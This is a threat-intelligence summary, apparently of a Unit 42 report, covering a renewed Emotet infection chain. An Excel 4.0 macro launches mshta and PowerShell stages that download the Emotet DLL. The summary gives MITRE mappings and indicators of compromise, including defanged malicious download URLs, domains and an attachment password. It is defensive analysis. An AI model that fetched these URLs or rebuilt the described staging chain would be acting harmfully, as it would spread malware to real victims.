New Emotet Infection Method

Unit 42 outlines a renewed Emotet infection method that uses an Excel 4.0 macro in a phishing email to stage PowerShell payloads and finally deliver the Emotet binary. The approach relies on obfuscated macros, a highly obfuscated HTML application, and multiple URLs to improve resilience against takedowns. #Emotet #Excel4.0

Keypoints

Emotet’s infection chain now starts with a phishing email delivering an Excel file containing an obfuscated Excel 4.0 macro.
The macro executes cmd.exe to run mshta.exe, which retrieves and executes a remote HTML application.
The HTML application is highly obfuscated and downloads additional PowerShell code for stage two.
The initial PowerShell downloader connects to a remote URL to fetch a second-stage PowerShell payload.
The second-stage PowerShell script contains 14 URLs to retrieve the Emotet binary, increasing resilience against takedowns.
The final Emotet payload is loaded from an encrypted PE stored in the DLL’s resource section.
Emotet commonly uses thread hijacking and various email lures (including password-protected ZIPs) to advance infections.

MITRE Techniques

[T1566.001] Phishing – Attachment – The new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro. ‘The new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro.’
[T1204.002] User Execution: Malicious File – The victim must enable macros on a vulnerable Windows host before the malicious content is activated. ‘The victim must enable macros on a vulnerable Windows host before the malicious content is activated.’
[T1059.003] Windows Command Shell – The macro code is enabled to execute cmd.exe to run mshta.exe with an argument to retrieve and execute a remote HTML application. ‘When the macro code is enabled, it executes cmd.exe to run mshta.exe with an argument to retrieve and execute a remote HTML application.’
[T1218.005] Signed Binary Proxy Execution: Mshta – The HTML application downloaded via mshta leads to further script execution. ‘The HTML application shown in Figure 4 is highly obfuscated. It will download and execute additional PowerShell code.’
[T1059.001] PowerShell – The initial and second-stage PowerShell code retrieve and execute Emotet payloads from remote sources. ‘The initial obfuscated PowerShell script… connects to hxxp://91.240.118[.]168/se/s.png. This URL returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.’
[T1071.001] Web Protocols – The malware uses HTTP(S) URLs to fetch stage components and binaries across multiple stages. ‘The second-stage PowerShell code contains 14 URLs to retrieve the Emotet binary.’
[T1027.001] Obfuscated/Compressed Files and Information – Hex and character obfuscation in the Excel macro and obfuscated HTML application to bypass static detection. ‘hex and character obfuscation…’

Indicators of Compromise

[Hash] 9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9 – Appendix A (form.zip)
[Hash] 6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88 – Appendix A (form.xlsm)
[Hash] 9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1 – Appendix B (First-stage PowerShell script)
[Hash] 5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed – Appendix B (Second-stage PowerShell script)
[Hash] 2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f – Appendix D (Emotet DLL)
[IP] 91.240.118[.]168 – Appendix B (PowerShell downloader URL)
[URL] hxxp://unifiedpharma[.]com/wp-content/5arxM/ – Appendix C
[URL] hxxp://hotelamerpalace[.]com/Fox-C404/LEPqPJpt4Gbr8BHAn/ – Appendix C
[Domain] unifiedpharma[.]com – Appendix C
[Domain] crmweb[.]info – Appendix C
[Domain] hotelamerpalace[.]com – Appendix C
[File] ssd.dll – Appendix D
[File path] C:UsersPublicDocuments ssd.dll – Appendix D
[File path] C:Users[username]AppDataLocal[random characters][random characters].[random characters] – Appendix D
[Password] EHGWQARLC – Appendix A